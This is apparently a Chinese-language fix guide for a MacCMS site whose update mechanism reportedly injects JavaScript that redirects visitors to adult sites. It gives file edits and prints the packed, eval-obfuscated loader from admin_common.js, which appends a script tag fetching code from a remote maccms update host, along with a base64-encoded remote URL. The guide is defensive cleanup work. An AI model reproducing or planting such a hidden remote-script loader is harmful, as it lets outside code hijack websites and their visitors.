新版本存在恶意的随机添加js文件投毒的问题,目前会导致晚上偷偷跳大人网站,如果实在难以解决的,还是换个程序吧……
1.删除,application/admin/controller/Update.php 更新:
一定要删除这个文件!
2.同目录Safety.php 修改file()
public function file()
{
$param = input();
if($param['ck']){
$ft = $param['ft'];
if(empty($ft)){
$ft = ['1','2'];
}
mac_echo('<style type="text/css">body{font-size:12px;color: #333333;line-height:21px;}span{font-weight:bold;color:#FF0000}</span></style>');
// 注释掉远程文件检查功能
// $url = base64_decode("aHR0cDovL3VwZGF0ZS5tYWNjbXMubGEv") . "v10/mac_files_".config('version')['code'].'.html';
// $html = mac_curl_get($url);
// $json = json_decode($html,true);
// if(!$json){
// return $this->error(lang('admin/safety/file_msg1'));
// }
$this->listDir('./');
if(!is_array($this->_files)){
return $this->error(lang('admin/safety/file_msg2'));
}
// 本地文件完整性检查
$total_files = count($this->_files);
$check_results = [];
foreach($this->_files as $k=>$v){
$file_path = ltrim($k, './');
$file_size = filesize($k);
$file_md5 = $v['md5'];
$file_perms = substr(sprintf('%o', fileperms($k)), -4);
// 检查文件是否可读
if(is_readable($k)) {
$status = '正常';
$color = 'green';
} else {
$status = '不可读';
$color = 'red';
}
// 检查文件大小是否合理
if($file_size > 0 && $file_size < 100000000) { // 小于100MB
$size_status = '正常';
$size_color = 'green';
} else {
$size_status = '异常';
$size_color = 'orange';
}
mac_echo($file_path . '---' .
"<font color='$color'>$status</font> | " .
"<font color='$size_color'>大小: " . number_format($file_size) . " 字节</font> | " .
"权限: $file_perms | MD5: " . substr($file_md5, 0, 8) . "...");
}
mac_echo("<br><strong>总计检查文件: $total_files 个</strong>");
exit;
}
return $this->fetch('admin@safety/file');
}
3.application/admin/view/index/welcome.html
删除
{if condition="$update_sql"}
<table class="tbinfo pleft layui-table" ><thead><th colspan="2">{:lang('admin/index/welcome/tip_update_db')}</th></thead><tr><td colspan="2"><font class="tif s20">{:lang('admin/index/welcome/tip_update_db_txt')}</font><a class="j-iframe" title="{:lang('admin/index/welcome/tip_update_go')}" data-href="{:url('update/step2')}"><font class="tit s20">{:lang('admin/index/welcome/tip_update_go')}</font></a> </td></tr></table>
{/if}
4./static/js/admin_common.js
删除
$(function(){
if( typeof(MAC_VERSION) !='undefined' && typeof(PHP_VERSION) !='undefined' && typeof(THINK_VERSION) !='undefined' ) {
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(\'3\').9(\'<0\'+\'1 4="\'+\'//5.6.7/8/?c=2&a=\'+b+\'&d=\'+e+\'&f=\'+g+\'&h=\'+i.j()+\'"></0\'+\'1>\');',20,20,'scr|ipt|check|body|src|update|maccms|la|v10|append|v|MAC_VERSION||p|PHP_VERSION|tp|THINK_VERSION|t|Math|random'.split('|'),0,{}));
}
});
- All rights reserved.
- No part of this website, including text and images, may be reproduced, modified, distributed, or transmitted in any form or by any means, without the prior written permission of the author.
- Unauthorized commercial use is strictly prohibited.
- Unauthorized personal use is strictly prohibited.